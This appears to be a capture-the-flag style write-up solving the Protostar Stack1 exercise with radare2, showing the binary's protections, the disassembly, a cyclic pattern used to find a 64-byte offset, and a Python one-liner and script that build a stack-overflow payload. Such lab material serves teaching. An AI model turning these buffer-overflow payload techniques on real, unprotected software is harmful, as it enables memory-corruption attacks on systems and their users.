Exploiting Protostar Stack1 using radare2

2017, Dec 18    

Exploiting Protostar Stack1

Problem link

You can check the previous problems here:

Problem source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>   /* errx() lives here; the original listing omitted it */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  /* unbounded copy: anything past 64 bytes runs into 'modified' */
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
  return 0;
}

We will work on this problem as if we did not have the C source code.

First we want to know more about the binary:

$ rabin2 -I stack1
arch     x86
binsz    23196
bintype  elf
bits     32
canary   false
class    ELF32
crypto   false
endian   little
havecode true
intrp    /lib/ld-linux.so.2
lang     c
linenum  true
lsyms    true
machine  Intel 80386
maxopsz  16
minopsz  1
nx       false
os       linux
pcalign  0
pic      false
relocs   true
relro    no
rpath    NONE
static   false
stripped false
subsys   linux
va       true

As you can see, the binary is a 32-bit ELF, it is not stripped, and it was built without stack canaries, PIC, NX or RELRO. With no canary the overflow will not be detected, and with the source still unknown to us the only thing we need from the disassembly is where `buffer` and `modified` sit relative to each other.

Let's have a look at what's happening inside the app.

We start the binary inside radare2, break at `main` and open Visual Mode (`VV`, the graph view) to see how it works:

[root:~/Downloads]# r2 -d stack1
Process with PID 10307 started...
= attach 10307 10307
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
[0xb7fdba30]> aas
[0xb7fdba30]> dcu main
Continue until 0x08048464 using 1 bpsize
hit breakpoint at: 8048464
[0x08048464]> VV
    .--------------------------------.
    |  0x8048487 ;[ga]               |
    | mov dword [local_5ch], 0       |
    |    ; [0xc:4]=-1                |
    |    ; 12                        |
    | mov eax, dword [arg_ch]        |
    | add eax, 4                     |
    | mov eax, dword [eax]           |
    | mov dword [local_4h], eax      |
    |    ; 0x1c                      |
    |    ; 28                        |
    | lea eax, dword [local_1ch]     |
    | mov dword [esp], eax           |
    | call sym.imp.strcpy;[ge]       |
    |    ; [0x5c:4]=-1               |
    |    ; '\'                       |
    |    ; 92                        |
    | mov eax, dword [local_5ch]     |
    | cmp eax, 0x61626364            |
    | jne 0x80484c0;[gf]             |
    `--------------------------------'

The key line is `cmp eax, 0x61626364`. `eax` is loaded from `[local_5ch]`, which is the `modified` variable, so our goal is to get 0x61626364 into that stack slot. The graph already tells us how far apart the two variables are: `strcpy` writes into `[local_1ch]` (the buffer at esp+0x1c) and `modified` is read from `[local_5ch]` (esp+0x5c), so `modified` begins 0x5c - 0x1c = 0x40 = 64 bytes after the start of the buffer, exactly the buffer size. The first four bytes we write past the buffer land in `modified`.

To confirm that offset without reading it off the disassembly, we use ragg2, another tool from the radare2 framework. `ragg2 -P` generates a cyclic pattern (a De Bruijn sequence, in which every 4-byte window is unique), so whatever bytes end up in a register after the overflow identify exactly one offset in our input:

$ ragg2 -P 100 -r > payload.txt
$ r2 -d stack1
Process with PID 3427 started...
= attach 3427 3427
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
[0xb7fdba30]> ood `! cat payload.txt`
Wait event received by different pid 3427
Process with PID 3458 started...
File dbg:///root/Downloads/stack1  AAABAACAAUAAV...AAcAAdAAeAAfAAgAAh reopened in read-write mode
= attach 3458 3458
3458
[0xb7fdba30]> dcu main
Continue until 0x08048464 using 1 bpsize
hit breakpoint at: 8048464
[0xb7fdba30]> V

Note: `ood` followed by arguments reopens the file in debugger mode with those arguments; the backticks make radare2 substitute the output of `! cat payload.txt`, so the pattern becomes `argv[1]`.

In visual mode you can step over instructions with `S` until `eax` has been loaded from `[local_5ch]`, i.e. just before `cmp eax, 0x61626364` executes. `wopO` then looks up the value in `eax` inside the pattern and prints the offset at which it occurs:

[0x080484a7]> wopO eax
64

The offset is 64, matching the 0x40 bytes between the two variables in the disassembly. Now let's rewrite the payload and exploit the binary. Note that x86 is little-endian, so the dword 0x61626364 has to be written as the bytes `\x64\x63\x62\x61` ("dcba", reversed) for `modified` to read back as 0x61626364. The one-liner below uses Python 2's `print` statement:

$ python -c 'print "A" * 64 + "\x64\x63\x62\x61" + "B" * 20' > payload.txt
$ r2 -d stack1
Process with PID 6158 started...
= attach 6158 6158
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
[0xb7fdba30]> ood `! cat payload.txt`
Wait event received by different pid 6158
Process with PID 6167 started...
File dbg:///root/Downloads/stack1  AAAAAAAA...AAAAdcbaBBBBBBBBBBBBBBBBBBBB reopened in read-write mode
= attach 6167 6167
6167
[0xb7fdba30]> dc
you have correctly got the variable to the right value
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x42424242 code=1 ret=0
[0x42424242]>

And we did it ;) The success message is printed before the crash, so `modified` held 0x61626364 at the compare. The SIGSEGV at 0x42424242 afterwards comes from the trailing `"B" * 20`: those bytes run past `modified` and over the saved return address, so when `main` returns, execution jumps to 0x42424242 ("BBBB"). They are not needed for this level (the 64 bytes of filler plus the four-byte value are enough), but the crash address is a useful sign that the same overflow also controls the return address, which is what the later Protostar levels are about.
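As an added example (not code from the original post or from radare2), the script below reproduces the three steps above in plain Python: generating a De Bruijn pattern like `ragg2 -P`, locating a register value in it like `wopO`, and packing 0x61626364 little-endian into the payload. Instead of running the real binary it uses a small model of `main`'s frame built from the offsets in the disassembly (buffer at esp+0x1c, `modified` at esp+0x5c); the frame size `FRAME_SIZE` and the uppercase-only alphabet are assumptions, so the pattern bytes differ from ragg2's even though the offset it recovers is the same 64.

```python
"""
Added example: De Bruijn pattern generation (ragg2 -P), offset lookup
(wopO) and little-endian payload construction for Protostar stack1,
run against a model of the stack frame instead of the real binary.
"""
import functools
import string
import struct

BUFFER_OFF = 0x1c     # lea eax, [local_1ch]: strcpy destination (esp+0x1c)
MODIFIED_OFF = 0x5c   # mov eax, [local_5ch]: 'modified' (esp+0x5c)
TARGET = 0x61626364   # cmp eax, 0x61626364
FRAME_SIZE = 0xa0     # assumed size of the model frame; the post does not
                      # show the real layout past 'modified'


@functools.lru_cache(maxsize=None)
def de_bruijn(alphabet, n):
    """Cyclic De Bruijn sequence B(k, n) over `alphabet`, as a str.

    Every window of n symbols occurs exactly once, so a window found in a
    register after the overflow maps to a single offset in the pattern.
    Standard Lyndon-word construction; the whole cycle is built and cached.
    """
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)


def cyclic_pattern(length, alphabet=string.ascii_uppercase, n=4):
    """First `length` bytes of the pattern, like `ragg2 -P length`."""
    seq = de_bruijn(alphabet, n)
    if length > len(seq):
        raise ValueError("pattern too long for this alphabet and n")
    return seq[:length].encode()


def find_offset(pattern, value):
    """Offset of a 32-bit register value inside the pattern, like `wopO`.

    The value is packed little-endian because that is how the bytes sat in
    memory on x86.  Returns -1 if the value did not come from the pattern.
    """
    return pattern.find(struct.pack("<I", value))


def build_payload(offset, target=TARGET, tail=b""):
    """`offset` filler bytes, then `target` as a little-endian dword.

    0x61626364 becomes b"\\x64\\x63\\x62\\x61" ("dcba"), as the post notes.
    """
    return b"A" * offset + struct.pack("<I", target) + tail


def simulate_stack1(argv1):
    """Model of main(): strcpy(buffer, argv1) then return `modified`.

    Offsets come from the disassembly (buffer at 0x1c, modified at 0x5c, so
    64 bytes apart).  Bytes beyond the model frame are dropped; in the real
    binary they overwrite the saved return address, which is why the post's
    run ends with SIGSEGV at 0x42424242.
    """
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<I", frame, MODIFIED_OFF, 0)          # modified = 0
    data = argv1.split(b"\x00", 1)[0] + b"\x00"              # strcpy stops at NUL
    room = FRAME_SIZE - BUFFER_OFF
    frame[BUFFER_OFF:BUFFER_OFF + min(len(data), room)] = data[:room]
    return struct.unpack_from("<I", frame, MODIFIED_OFF)[0]


def exploit():
    """Whole workflow: overflow with the pattern, find the offset, rebuild."""
    pattern = cyclic_pattern(100)
    leaked = simulate_stack1(pattern)       # what `mov eax, [local_5ch]` loads
    offset = find_offset(pattern, leaked)   # wopO eax -> 64
    payload = build_payload(offset)
    return offset, payload, simulate_stack1(payload)


if __name__ == "__main__":
    off, payload, modified = exploit()
    print("offset:", off)
    print("payload:", payload)
    if modified == TARGET:
        print("you have correctly got the variable to the right value")
    else:
        print("Try again, you got 0x%08x" % modified)
```

Running it prints offset 64 and the 68-byte payload; `find_offset` returns -1 for a value such as 0x42424242 that never appears in the pattern, which is the check that tells you a crash value did not come from your input at all.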